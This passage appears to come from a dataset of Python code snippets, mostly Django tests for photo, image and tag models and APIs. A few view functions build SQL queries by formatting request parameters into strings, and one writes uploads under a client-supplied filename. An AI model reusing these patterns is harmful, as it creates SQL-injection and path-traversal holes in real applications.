test_create(self):\n data = {\n 'image': images.load_image()\n }\n photo = Photo.objects.create(**data)\n self.assertTrue(photo.pk)", "def setUp(self):\n\t\tself.username = fake.user_name()\n\t\tself.password = fake.password()\n\n\t\tself.image_name = 'test.png'\n\t\tself.img_url = 'static/img/test.png'\t\n\n\t\tself.user = User.objects.create_user(\n\t\t\tusername=self.username, password=self.password)\n\t\tself.user = authenticate(username=self.username, password=self.password)\n\t\tself.client.login(username=self.username, password=self.password)\n\n\t\tself.image = Image.frombytes('L', (100, 100), \"\\x00\" * 100 * 100)\n\t\tself.image = pil_to_django(self.image, 'png')\n\n\t\tself.created_image = UserPhoto(image=self.image, name=self.image_name, created_by=self.user).save()", "def test_recipe_nutrition_by_id_image(self):\n pass", "def test_statistics_view_set_photo_get_successful(self):\n # Create test users\n user = account_models.User.objects.create_superuser('[email protected]', 'pass')\n user.is_admin = True\n user.created_at = datetime(year=2016, month=12, day=31)\n user.save()\n\n user_1 = account_models.User.objects.create_user('[email protected]', 'test1', 'pass')\n user_1.created_at = datetime(year=2017, month=1, day=12)\n user_1.save()\n\n user_2 = account_models.User.objects.create_user('[email protected]', 'test2', 'pass')\n user_2.created_at = datetime(year=2017, month=1, day=15)\n user_2.save()\n\n user_3 = account_models.User.objects.create_user('[email protected]', 'test3', 'pass')\n user_3.created_at = datetime(year=2017, month=1, day=29)\n user_3.save()\n\n user_4 = account_models.User.objects.create_user('[email protected]', 'test4', 'pass')\n user_4.created_at = datetime(year=2017, month=1, day=31, hour=23, minute=59, second=59)\n user_4.save()\n\n user_5 = account_models.User.objects.create_user('[email protected]', 'test5', 'pass')\n user_5.created_at = datetime(year=2017, month=2, day=17)\n user_5.save()\n\n user_6 = account_models.User.objects.create_user('[email protected]', 'test6', 'pass')\n user_6.created_at = datetime(year=2017, month=2, day=21)\n user_6.save()\n\n user_7 = account_models.User.objects.create_user('[email protected]', 'test7', 'pass')\n user_7.created_at = datetime(year=2017, month=3, day=1, hour=0, minute=0, second=0)\n user_7.save()\n\n # Create test photos\n category_1 = photo_models.PhotoClassification.objects.get(name='Other')\n category_2 = photo_models.PhotoClassification.objects.get(name='Urban')\n\n photo_1 = photo_models.Photo.objects.create(image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_1.category.set([category_1])\n photo_1.created_at = datetime(year=2017, month=1, day=10)\n photo_1.save()\n\n photo_2 = photo_models.Photo.objects.create(\n user=user_1, image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_2.category.set([category_1])\n photo_2.created_at = datetime(year=2017, month=1, day=12)\n photo_2.save()\n\n photo_3 = photo_models.Photo.objects.create(\n user=user_2, image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_3.category.set([category_2])\n photo_3.created_at = datetime(year=2017, month=1, day=16)\n photo_3.save()\n\n photo_4 = photo_models.Photo.objects.create(\n user=user_3, image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_4.category.set([category_1])\n photo_4.created_at = datetime(year=2017, month=1, day=31)\n photo_4.save()\n\n photo_5 = photo_models.Photo.objects.create(\n user=user_4, image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_5.category.set([category_1])\n photo_5.created_at = datetime(year=2017, month=2, day=2)\n photo_5.save()\n\n photo_6 = photo_models.Photo.objects.create(\n user=user_5, image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_6.category.set([category_1])\n photo_6.created_at = datetime(year=2017, month=2, day=18)\n photo_6.save()\n\n photo_7 = photo_models.Photo.objects.create(\n user=user_6, image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_7.category.set([category_1])\n photo_7.created_at = datetime(year=2017, month=2, day=23)\n photo_7.save()\n\n photo_8 = photo_models.Photo.objects.create(\n user=user_7, image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_8.category.set([category_2])\n photo_8.created_at = datetime(year=2017, month=3, day=1)\n photo_8.save()\n\n photo_9 = photo_models.Photo.objects.create(\n user=user_7, image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_9.category.set([category_2])\n photo_9.created_at = datetime(year=2017, month=3, day=2)\n photo_9.save()\n\n client = APIClient()\n client.force_authenticate(user)\n\n request = client.get('/api/statistics/photos')\n results = request.data['results']\n\n self.assertEquals(len(results), 4) # 3 months of data\n self.assertEquals(results[0]['date'], '2016-12-1')\n self.assertEquals(results[0]['average_photos_per_user'], 0)\n self.assertEquals(results[1]['date'], '2017-1-1')\n self.assertEquals(results[1]['average_photos_per_user'], 0.80)\n self.assertEquals(results[2]['date'], '2017-2-1')\n self.assertEquals(results[2]['average_photos_per_user'], 1.0)\n self.assertEquals(results[3]['date'], '2017-3-1')\n self.assertEquals(results[3]['average_photos_per_user'], 1.12)", "def setUp(self):\n account_models.User.objects.create_user(email='[email protected]', password='WhoAmI', username='aov1')\n photo_models.PhotoClassification.objects.create_or_update(name='City',\n category_image=Photo(\n open('apps/common/test/data/photos/small.jpg',\n 'rb')),\n icon=Photo(\n open('apps/common/test/data/photos/small.jpg',\n 'rb')))\n abstract = photo_models.PhotoClassification.objects.create_or_update(name='Abstract')\n photo_models.PhotoClassification.objects.create_or_update(name='Rural', classification_type='category')\n photo_feed = photo_models.PhotoFeed.objects.create_or_update(name='Abstract')\n abstract.photo_feed = photo_feed\n abstract.save()", "def test_get_photos(self):\n recipe = Recipes.objects.create(chef=self.user, draft=False, private=False)\n photo = Photos.objects.create(recipe=recipe, photo_order=1)\n\n url = '/0/chefs/%i/photos' % self.user.pk\n\n resp = self.client.get(url)\n self.assertPermissionDenied(resp)\n\n headers = self.login()\n resp = self.client.get(url, **headers)\n self.assertEqual(resp.status_code, 200)\n self.assertIn('photos', resp.data)\n self.assertEqual(1, len(resp.data['photos']))\n keys = ('edit_date', 'creation_date', 'id', u'temperature', 'url', 'recipe', 'cover',\n 'time', 'instructions', 'order', 'quantity')\n self.assertEqual(set(keys), set(resp.data['photos'][0].keys()))", "def test_tags_limited_to_user(self):\n user2 = get_user_model().objects.create_user(\n '[email protected]',\n '123456'\n )\n Tag.objects.create(user=user2, name='Fruity')\n tag = Tag.objects.create(user=self.user, name='Comfort Food')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def tag_image(self, owner_userid, tag_userid, image_id, tag_name):\n\t\ttry:\n\t\t\towner_userid = validation.cast_integer(owner_userid, 'owner_userid')\n\t\t\ttag_userid = validation.cast_integer(tag_userid, 'userid')\n\t\t\timage_id = validation.cast_integer(image_id, 'image_id')\n\t\t\tvalidation.required(tag_name, 'tag_name')\n\t\texcept errors.ValidationError, ex:\n\t\t\treturn utils.return_deferred_error(ex.value)\n\t\ttag_name = tag_name.strip()\n\t\t@stack\n\t\tdef tag_txn(txn, owner, tagger, image, tag):\n\t\t\ttag = tag.lower()\n\t\t\ttxn.execute(\"\"\"\n\t\t\t\tselect zoto_insert_user_image_tag(%s, %s, %s, %s)\n\t\t\t\"\"\", (owner, image, tag, tagger))\n\n\t\treturn self.app.db.runInteraction(tag_txn, owner_userid, tag_userid, image_id, tag_name)", "def test_profile_image_requested_field(self):\n source_comments = [self.create_source_comment()]\n self.register_get_thread_response({\n \"id\": self.thread_id,\n \"course_id\": str(self.course.id),\n \"thread_type\": \"discussion\",\n \"children\": source_comments,\n \"resp_total\": 100,\n })\n self.register_get_user_response(self.user, upvoted_ids=[\"test_comment\"])\n self.create_profile_image(self.user, get_profile_image_storage())\n\n response = self.client.get(self.url, {\"thread_id\": self.thread_id, \"requested_fields\": \"profile_image\"})\n assert response.status_code == 200\n response_comments = json.loads(response.content.decode('utf-8'))['results']\n for response_comment in response_comments:\n expected_profile_data = self.get_expected_user_profile(response_comment['author'])\n response_users = response_comment['users']\n assert expected_profile_data == response_users[response_comment['author']]", "def test_save_image(self):\n self.roses.save_image()\n image = Images.objects.all()\n self.assertEqual(len(image), 1)", "def model_processing(img):\n\n # assert isinstance(img, EmotionalImage)\n\n if str(img.name).find('json') > -1:\n return\n user = get_user(img.path + '/' + 'meta.json')\n filePath = img.path + '/' + img.name\n # print(\"---------------Processsing----------------\", img.name)\n\n features = extract_features(filePath)\n emotions = predict_emotions(features)\n uuid1 = uuid.uuid4()\n emImage = EmotionalImage(\n uuid1, img.name, img.path, features, emotions, \"\", \"\", \"\")\n user.images.append(emImage)\n # user.save()", "def test_tags_limited_to_user(self):\n imposter = get_user_model().objects.create_user(\n email='[email protected]', password='im_an_imposter')\n Tag.objects.create(user=imposter, name='BAD_FOOD')\n tag = Tag.objects.create(user=self.user, name='fruit')\n res = self.client.get(TAG_URL)\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def test_tags_limited_to_user(self):\n user2 = create_user('[email protected]', 'OtherPassword')\n Tag.objects.create(user=user2, name='Fruity')\n tag = Tag.objects.create(user=self.user, name='Home Food')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def upload2(request):\n uploaded = request.read\n fileSize = int(uploaded.im_self.META[\"CONTENT_LENGTH\"])\n fileName = uploaded.im_self.META[\"HTTP_X_FILE_NAME\"] \n fileContent = uploaded(fileSize)\n \n \"\"\"Write image to disk.\"\"\"\n fn, ext = os.path.splitext(fileName)\n name = fn + timezone.now().strftime(\"%Y_%m_%d_%H_%M_%S_%f\") + base64.urlsafe_b64encode(os.urandom(settings.SALT_LENGHT)) + ext\n fileHandler = open(settings.MEDIA_ROOT + \"images/\" + name, \"wb\")\n fileHandler.write(fileContent)\n fileHandler.close()\n \n \"\"\"Create md5hash digest for image.\"\"\"\n base64string = base64.b64encode(fileContent)\n mdfive = md5.new(base64string).hexdigest()\n \n \"\"\"Write image data to db.\"\"\"\n latitude = request.GET.get('lat')\n longitude = request.GET.get('lon')\n tags = request.GET.get('tags').split(' ')\n\n image = Image(title = name, md5hash = mdfive, pub_date = timezone.now(), lat = latitude, lon = longitude)\n image.save()\n\n for tagtext in tags:\n if Tag.objects.filter(name=tagtext).exists():\n t = Tag.objects.get(name=tagtext)\n else:\n t = Tag(name = tagtext)\n t.save()\n image.tags.add(t)\n image.save()\n\n return HttpResponse('{\"success\": true}')", "def test_tags_limited_to_user(self):\n user2 = get_user_model().objects.create_user(\n '[email protected]',\n 'testpass'\n )\n Tag.objects.create(user=user2, name='Fruity')\n tag = Tag.objects.create(user=self.user, name='Comfort Food')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def test_api_thumbnail_retrieve_by_random_user(self):\n user = UserFactory()\n\n self.assert_user_cannot_retrieve_thumbnail(user, self.some_thumbnail)", "def test_tags_limited_to_user(self):\n user2 = get_user_model().objects.create_user(\n 'Other User', '[email protected]', 'otherpassword')\n Tag.objects.create(user=user2, name='Nonveg')\n tag = Tag.objects.create(user=self.user, name='Fruity')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def test_m2m_dependent_object_import(self):\n user_profile: UserProfile = self.user_profiles[0] # See self.setUp()\n\n # ************ First Handle generating the Tags/Images Synthetically Through the Importer ************\n # Initialize Importers\n image_manager = ImporterManager(importer=ImageImporter())\n tag_manager = ImporterManager(importer=TagImporter())\n up_manager = ImporterManager(importer=UserProfileImporter())\n company_manger = ImporterManager(importer=CompanyImporter())\n user_manager = ImporterManager(importer=UserImporter())\n\n # Populate leaf models of dependency tree with kv data\n for row,image in enumerate(self.images):\n user_manager.update_kvs(field_name='username', value=user_profile.user.username, row=row)\n company_manger.update_kvs(field_name='natural_id', value=self.company.natural_id, row=row)\n\n #: Retrieve data associated with kv data\n user_manager.get_available_rows()\n company_manger.get_available_rows()\n\n #: Populate data up the dependency tree with retrieved rows\n for row,image in enumerate(self.images):\n up_manager.update_kvs('company', company_manger.get_object_or_list(row), row=row)\n up_manager.update_kvs('user', user_manager.get_object_or_list(row), row=row)\n\n #: Retrieve data associated with models depended upon\n up_manager.get_available_rows()\n\n tag_manager.update_kvs('slug', 'blue', row=0, col=0)\n tag_manager.update_kvs('slug', 'green', row=0, col=1)\n tag_manager.update_kvs('company', company_manger.get_object_or_list(0), row=0, col=0)\n tag_manager.update_kvs('created_by', up_manager.get_object_or_list(0), row=0, col=0)\n\n tag_manager.update_kvs('slug', 'yellow', row=1, col=0)\n tag_manager.update_kvs('company', company_manger.get_object_or_list(1), row=1, col=0)\n tag_manager.update_kvs('created_by', up_manager.get_object_or_list(1), row=1, col=0)\n\n #: Retrieve associate intermediate data\n tag_manager.get_available_rows()\n\n for row,image in enumerate(self.images):\n image_manager.update_kvs('path', image.path, row=row)\n image_manager.update_kvs('name', image.name, row=row)\n image_manager.update_kvs('tag', tag_manager.get_object_or_list(row), row=row)\n image_manager.update_kvs('company', company_manger.get_object_or_list(row), row=row)\n\n image_manager.get_available_rows()\n\n self.assertNotEqual(image_manager.get_object_or_list(0), [])\n self.assertIsInstance(image_manager.get_object_or_list(0), Image)\n\n self.assertNotEqual(image_manager.get_object_or_list(1), [])\n self.assertIsInstance(image_manager.get_object_or_list(1), Image)", "def test_edit_image_instance(self):\n self.client.force_authenticate(self.user1)\n data = {\n \"img_name\": \"photo_user1\",\n \"img_description\": \"photo of user1\",\n \"favourite\": True,\n \"width\": 700,\n \"height\": 500,\n \"share_user\": [],\n }\n url = reverse(self.url_name_one, args=(1,))\n response = self.client.put(url, data, format=\"multipart\")\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n # Get edited object, convert to dict and compare with inputs\n obj = model_to_dict(Images.objects.get(id=1))\n for field, edited_data in data.items():\n self.assertEqual(edited_data, obj[field])\n # Check if image was edited to a new input\n edited_img = Image.open(self.test_pic_folder + \"/test.png\")\n self.assertEqual(edited_img.size, (700, 500))", "def test_save_image(self):\n self.new_image.save_image()\n self.assertTrue(len(Image.objects.all()) > 0)", "def multi_get_image_tags(self, owner_userid, image_ids, tag_type='owner'):\n\t\tif owner_userid:\n\t\t\towner_userid = validation.cast_integer(owner_userid, 'owner_userid')\n\t\tfor id in image_ids:\n\t\t\tid = validation.cast_integer(id, 'image_id')\n\t\tif tag_type == 'owner':\n\t\t\tinclude_clause = \"AND tag_userid = t2.owner_userid\"\n\t\telif tag_type == 'public':\n\t\t\tinclude_clause = \"AND tag_userid != t2.owner_userid\"\n\t\telif tag_type == 'all':\n\t\t\tinclude_clause = \"\"\n\t\t\t\n\t\timage_list = []\n\t\tfor id in image_ids:\n\t\t\timage_list.append(\"%s\" % id)\n\n\t\towner_clause = \"\"\n\t\tif owner_userid:\n\t\t\towner_clause = \"AND t2.owner_userid = %(owner_userid)s\"\n\t\tquery_args = {'owner_userid': owner_userid}\n\t\t\t\n\t\treturn self.app.db.query(\"\"\"\n\t\t\t\tSELECT\n\t\t\t\t\ttag_name,\n\t\t\t\t\tcount(*) AS cnt_images\n\t\t\t\tFROM\n\t\t\t\t\tuser_image_tags t1\n\t\t\t\t\tJOIN user_images t2 USING (image_id)\n\t\t\t\tWHERE\n\t\t\t\t\tt1.image_id in (%s)\n\t\t\t\t\t%s\n\t\t\t\t\t%s\n\t\t\t\tGROUP BY\n\t\t\t\t\ttag_name\n\t\t\t\tORDER BY\n\t\t\t\t\ttag_name asc\n\t\t\t\t\"\"\" % (','.join(image_list), owner_clause, include_clause), query_args)", "def test_tags_limited_to_user(self):\n\n user2 = get_user_model().objects.create_user(\n email='[email protected]',\n password='23pass1234&'\n )\n\n Tag.objects.create(user=self.user, name='Vegan')\n Tag.objects.create(user=self.user, name='Dessert')\n Tag.objects.create(user=user2, name='Valami mas')\n\n res = self.client.get(TAGS_URL)\n\n tags = Tag.objects.filter(user=self.user).order_by('-name')\n serializer = TagSerializer(tags, many=True)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), len(tags))\n self.assertEqual(res.data, serializer.data)", "def test_create_image(self):\n pass", "def test_getImages(self): # GIVEN the group chat has at least one image\n testBot = bot.Bot(os.environ['bot_id'], os.environ['token'], os.environ['group_ID'])\n imageList = testBot.run() #AND THEN post_images calls the private get_images method which returns an array\n self.assertTrue(len(imageList) > 0) #THEN there should be at least one element in the array", "def test_profile_image_requested_field(self):\n self.register_get_user_response(self.user)\n cs_thread = make_minimal_cs_thread({\n \"id\": self.thread_id,\n \"course_id\": str(self.course.id),\n \"username\": self.user.username,\n \"user_id\": str(self.user.id),\n })\n self.register_get_thread_response(cs_thread)\n self.create_profile_image(self.user, get_profile_image_storage())\n response = self.client.get(self.url, {\"requested_fields\": \"profile_image\"})\n assert response.status_code == 200\n expected_profile_data = self.get_expected_user_profile(self.user.username)\n response_users = json.loads(response.content.decode('utf-8'))['users']\n assert expected_profile_data == response_users[self.user.username]", "def test_user_photo_creation_succeeds(self):\n\t\timage_name = 'test1.png'\n\t\twith open(self.img_url, 'rb') as image:\t\t\t\n\t\t\tdata = {'image': image, 'name':image_name}\t\t\t\n\t\t\tresponse = self.client.post(reverse('photos'), data)\n\t\t\timage.close()\n\t\tself.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\t\tself.assertEqual(response.data.get('name'), image_name)", "def sample_photo(user, title='Lovely Photo'):\n return Photo.objects.create(user=user, title=title)", "def test_profile_image_requested_field(self):\n self.register_get_user_response(self.user)\n cs_comment_child = self.make_comment_data('test_child_comment', self.comment_id, children=[])\n cs_comment = self.make_comment_data(self.comment_id, None, [cs_comment_child])\n cs_thread = make_minimal_cs_thread({\n 'id': self.thread_id,\n 'course_id': str(self.course.id),\n 'children': [cs_comment],\n })\n self.register_get_thread_response(cs_thread)\n self.register_get_comment_response(cs_comment)\n self.create_profile_image(self.user, get_profile_image_storage())\n\n response = self.client.get(self.url, {'requested_fields': 'profile_image'})\n assert response.status_code == 200\n response_comments = json.loads(response.content.decode('utf-8'))['results']\n\n for response_comment in response_comments:\n expected_profile_data = self.get_expected_user_profile(response_comment['author'])\n response_users = response_comment['users']\n assert expected_profile_data == response_users[response_comment['author']]", "def test_photo_classification_view_set_get_filtered_successful(self):\n # Test data\n user = account_models.User.objects.get(email='[email protected]')\n\n # Simulate auth\n token = test_helpers.get_token_for_user(user)\n\n # Get data from endpoint\n client = APIClient()\n client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n\n request = client.get('/api/photo_classifications?classification=tag')\n results = request.data['results']\n\n self.assertEquals(len(results), 2)", "def test_get_image_id(self):\n self.roses.save_image()\n image_id=Images.get_image_id(self.roses.id)\n self.assertTrue(image_id.id==self.roses.id)", "def test_tags_limited_to_user(self):\n user2 = User.objects.create(\n email='[email protected]',\n password='test_password'\n )\n Tag.objects.create(user=user2, name='Fruity')\n Tag.objects.create(user=self.user, name='Comfort Food')\n\n res = self.client.get(TAGS_URL)\n\n tags = Tag.objects.filter(user=self.user).order_by('-name')\n serializer = TagSerializer(tags, many=True)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data, serializer.data)", "def test_add_tagitem(self):\n record = self.good_record()\n record['tag'] = self.tag\n # Create a fake record in mongo\n id = self.images.insert(record)\n\n status = self.m.add_tag(id, self.system, 'testtag')\n self.assertTrue(status)\n rec = self.images.find_one({'_id': id})\n self.assertIsNotNone(rec)\n self.assertIn(self.tag, rec['tag'])\n self.assertIn('testtag', rec['tag'])", "def test_image_uploads_on_save(self):\n \n files_count = len(os.listdir(settings.MEDIA_ROOT + '/persons'))\n with open('media/test_images/test.jpg') as f:\n self.client.post(reverse('edit'), {'ava': f})\n files_count_after = len(os.listdir(settings.MEDIA_ROOT + '/persons'))\n # added file and thumbnail\n self.assertEquals(files_count_after - files_count, 2) \n \n # test image scales \n from PIL import Image\n im = Image.open(settings.MEDIA_ROOT + '/persons/test.thumbnail.jpg')\n thumbnail_size = Person.thumbnail_size\n self.assertEquals((thumbnail_size,thumbnail_size), im.size)", "def test_upload_image(self):\n with open('apps/upload/tests/media/test.jpg') as f:\n r = post(self.client, 'upload.up_image_async', {'image': f},\n args=['questions.Question', 1])\n\n eq_(200, r.status_code)\n json_r = json.loads(r.content)\n eq_('success', json_r['status'])\n file = json_r['file']\n eq_('test.jpg', file['name'])\n eq_(90, file['width'])\n eq_(120, file['height'])\n name = '098f6b.jpg'\n message = 'Url \"%s\" does not contain \"%s\"' % (file['url'], name)\n assert (name in file['url']), message\n\n eq_(1, ImageAttachment.objects.count())\n image = ImageAttachment.objects.all()[0]\n eq_('pcraciunoiu', image.creator.username)\n eq_(150, image.file.width)\n eq_(200, image.file.height)\n eq_('question', image.content_type.model)\n eq_(1, image.object_id)", "def test_photo_classification_view_set_post_update(self):\n # Test data\n user = account_models.User.objects.get(email='[email protected]')\n\n # Simulate auth\n token = test_helpers.get_token_for_user(user)\n\n # Get data from endpoint\n client = APIClient()\n client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n\n payload = {\n 'name': 'Night',\n 'classification_type': 'tag'\n }\n\n request = client.post('/api/photo_classifications', data=payload, format='json')\n result = request.data\n\n self.assertEquals(result['name'], 'Night')\n\n # Query for entry as well\n classifications = photo_models.PhotoClassification.objects.all()\n\n self.assertEquals(len(classifications), 12)\n self.assertEquals(classifications[11].name, 'Night')", "def test_upload_image(self):\n image = self.mock_master.get_imagelist(self.region1)[0]\n id = self.mock_master.upload_image(self.region2, image)\n found = False\n for i in self.mock_master.get_imagelist(self.region2):\n if i.id == id:\n self.assertEquals(i.region, self.region2.region)\n self.assertEquals(i.name, image.name)\n self.assertEquals(i.checksum, image.checksum)\n found = True\n break\n self.assertTrue(found)", "def test_signup_photo(self, mocked_sendy):\n url = '/0/chefs'\n data = {\n 'email': '[email protected]',\n 'password': 'secret',\n 'name': 'John',\n 'surname': 'Doe',\n 'language': 'es',\n 'photo': IMAGES['png'],\n }\n resp = self.client.post(url, data=data)\n self.assertEqual(resp.status_code, 200)\n self.assertIn('auth', resp.data)\n self.assertIn('token', resp.data['auth'])\n # Check that the photo exists\n self.assertTrue(Chefs.objects.last().avatar_photos.all())", "def addImageSuggestion(self, item, metadata):\n claims = item.get().get('claims')\n\n if not metadata.get(u'imageurl'):\n # Nothing to add\n return\n if u'P4765' in claims:\n # Already has a suggestion\n return\n\n if u'P18' in claims:\n newimage = requests.get(metadata.get(u'imageurl'), stream=True)\n if not newimage.headers.get('Content-length'):\n return\n if not newimage.headers.get('Content-length').isnumeric():\n return\n newimagesize = int(newimage.headers['Content-length'])\n #print (u'Size of the new image is %s according to the headers' % (newimagesize,))\n if newimagesize < 500000:\n # Smaller than 500KB is just too small to bother check to replace\n return\n\n for imageclaim in claims.get(u'P18'):\n currentsize = imageclaim.getTarget().latest_file_info.size\n #print (u'Size of the current image is %s' % (currentsize,))\n # New image should at least be 4 times larger\n if currentsize * 4 > newimagesize:\n return\n\n newclaim = pywikibot.Claim(self.repo, u'P4765')\n newclaim.setTarget(metadata[u'imageurl'])\n pywikibot.output('Adding commons compatible image available at URL claim to %s' % item)\n item.addClaim(newclaim)\n\n if metadata.get(u'imageurlformat'):\n newqualifier = pywikibot.Claim(self.repo, u'P2701')\n newqualifier.setTarget(pywikibot.ItemPage(self.repo, metadata.get(u'imageurlformat')))\n pywikibot.output('Adding new qualifier claim to %s' % item)\n newclaim.addQualifier(newqualifier)\n\n newqualifier = pywikibot.Claim(self.repo, u'P2699')\n newqualifier.setTarget(metadata[u'describedbyurl'])\n pywikibot.output('Adding new qualifier claim to %s' % item)\n newclaim.addQualifier(newqualifier)\n\n if metadata.get('title'):\n if metadata.get('title').get(u'en'):\n title = pywikibot.WbMonolingualText(metadata.get('title').get(u'en'), u'en')\n else:\n lang = list(metadata.get('title').keys())[0]\n title = pywikibot.WbMonolingualText(metadata.get('title').get(lang), lang)\n newqualifier = pywikibot.Claim(self.repo, u'P1476')\n newqualifier.setTarget(title)\n pywikibot.output('Adding new qualifier claim to %s' % item)\n newclaim.addQualifier(newqualifier)\n\n if metadata.get('creatorname'):\n newqualifier = pywikibot.Claim(self.repo, u'P2093')\n newqualifier.setTarget(metadata.get('creatorname'))\n pywikibot.output('Adding new qualifier claim to %s' % item)\n newclaim.addQualifier(newqualifier)\n\n if metadata.get(u'imageurllicense'):\n newqualifier = pywikibot.Claim(self.repo, u'P275')\n newqualifier.setTarget(pywikibot.ItemPage(self.repo, metadata.get(u'imageurllicense')))\n pywikibot.output('Adding new qualifier claim to %s' % item)\n newclaim.addQualifier(newqualifier)", "def test_get_imagelist_inmutable(self):\n images1 = self.mock_master.get_imagelist(self.region1)\n images2 = self.mock_master.get_imagelist(self.region1)\n r2dict = dict((i.id, i) for i in images2)\n self.assertEquals(images1, images2)\n self.assertNotEquals(id(images1), id(images2))\n for image in images1:\n self.assertIn(image.id, r2dict)\n image2 = r2dict[image.id]\n self.assertEquals(image, image2)\n self.assertNotEquals(id(image), id(image2))\n self.assertNotEquals(id(image.user_properties),\n id(image2.user_properties))", "def test_photo_classification_view_set_post_successful(self):\n # Test data\n user = account_models.User.objects.get(email='[email protected]')\n\n # Simulate auth\n token = test_helpers.get_token_for_user(user)\n\n # Get data from endpoint\n client = APIClient()\n client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n\n payload = {\n 'name': 'Night',\n 'classification_type': 'tag'\n }\n\n request = client.post('/api/photo_classifications', data=payload, format='json')\n result = request.data\n\n self.assertEquals(result['name'], 'Night')\n\n # Query for entry as well\n classifications = photo_models.PhotoClassification.objects.all()\n\n # 11 classifications are loaded by fixture\n self.assertEquals(len(classifications), 12)", "def test_update_multiple(self):\n tag_id = \"update_photo_tag\"\n # Get a couple of photos\n photos = self.photos[:2]\n\n # Add the tag using a list of photo objects\n self.client.photos.update(photos, tagsAdd=tag_id)\n\n # Check that it's there\n for photo in self.client.photos.list()[:2]:\n self.assertIn(tag_id, photo.tags)\n\n # Remove the tags using a list of photo ids\n self.client.photos.update([photo.id for photo in photos],\n tagsRemove=tag_id)", "def tag_images(self, image_files, model=None):\n return self._multi_image_op(image_files, ['tag'], model=model)", "def test_get_photos_paging(self):\n pass", "def test_recipe_taste_by_id_image(self):\n pass", "def test_type_image(image):\n resource = models.MediaResource(image=image)\n\n assert resource.type == models.MediaResource.TYPE_IMAGE", "def __init__(self, user_id: str = None, image: str = None): # noqa: E501\n self.swagger_types = {\"user_id\": str, \"image\": str}\n\n self.attribute_map = {\"user_id\": \"userId\", \"image\": \"image\"}\n self._user_id = user_id\n self._image = image", "def test_add_same_image_two_system(self):\n record = self.good_record()\n record['tag'] = self.tag\n # Create a fake record in mongo\n id1 = self.images.insert(record.copy())\n # add testtag for systema\n status = self.m.add_tag(id1, self.system, 'testtag')\n self.assertTrue(status)\n record['system'] = 'systemb'\n id2 = self.images.insert(record.copy())\n status = self.m.add_tag(id2, 'systemb', 'testtag')\n self.assertTrue(status)\n # Now make sure testtag for first system is still\n # present\n rec = self.images.find_one({'_id': id1})\n self.assertIsNotNone(rec)\n self.assertIn('testtag', rec['tag'])", "def setUp(self):\n\n self.user_1 = User.objects.create_user(\n username='testuser', password='12345',\n email='[email protected]'\n )\n\n # self.profile_1 = Profile.objects.create(user=self.user_1,\n # image='profile_default.jpg')", "def common_images_between_users(request):\n collected_values = {}\n\n if request.method != 'GET':\n collected_values[\"success\"] = False\n collected_values[\"errmsg\"] = \"Wrong HTTP verb\"\n return JsonResponse(collected_values, status=400)\n\n collected_values[\"user_id\"] = request.GET[\"user_id\"]\n uid = collected_values[\"user_id\"]\n collected_values[\"token\"] = request.GET[\"token\"]\n token = collected_values[\"token\"]\n collected_values[\"oid\"] = request.GET[\"oid\"]\n oid = collected_values[\"oid\"]\n\n # Check auth\n is_valid, collected_values[\"token\"] = check_auth(uid, token, timezone.now())\n if not is_valid:\n collected_values[\"success\"] = False\n collected_values[\"errmsg\"] = \"Invalid Token\"\n return JsonResponse(collected_values, status=400)\n\n # Get all matching users and the image id from linx_reactions\n user_raw_query = \"SELECT DISTINCT a.rid, a.iid FROM linx_reactions as a INNER JOIN linx_reactions as b ON a.iid = b.iid AND a.user_id == \\'{}\\' AND b.user_id = \\'{}\\' ORDER BY a.iid;\".format(uid, oid)\n\n image_ids_to_list = Reactions.objects.raw(user_raw_query)\n\n image_ids = \"\"\n\n # Load rows to string\n for image_obj in image_ids_to_list:\n image_ids = image_ids + \"\\'\" + str(image_obj.iid) + \"\\',\"\n\n # Remove last comma\n image_ids = image_ids[:-1]\n\n image_links_query = \"SELECT iid,link FROM linx_images WHERE iid IN ({});\".format(image_ids)\n image_links_to_show = Images.objects.raw(image_links_query)\n list_image_ids = []\n for image_obj in image_links_to_show:\n list_image_ids.append(image_obj.link)\n\n collected_values[\"images_urls\"] = list_image_ids\n collected_values[\"success\"] = True\n\n LOGGER.info(\"Common images between users result: %s\", collected_values)\n return JsonResponse(collected_values, status=200)", "def test_single_image_with_special_tag(self, client, tag):\n train_id = gbl.get_train_ids()[0]\n params = dict(train_id=train_id, tag=tag, step=1)\n url = get_url(BASE_URL, params)\n\n response = client.get(url)\n assert response.status_code == 400\n\n response = response.get_json()\n assert response['error_code'] == '5054500D'\n assert response['error_msg'] == \"Image is not exist. Detail: Invalid parameter value. \" \\\n \"Can not find any data in this train job by given tag.\"", "def test_emotion_is_created_and_attached_to_user(self):\n one_user = User.objects.last()\n\n emotion = EmotionFactory(user=one_user, 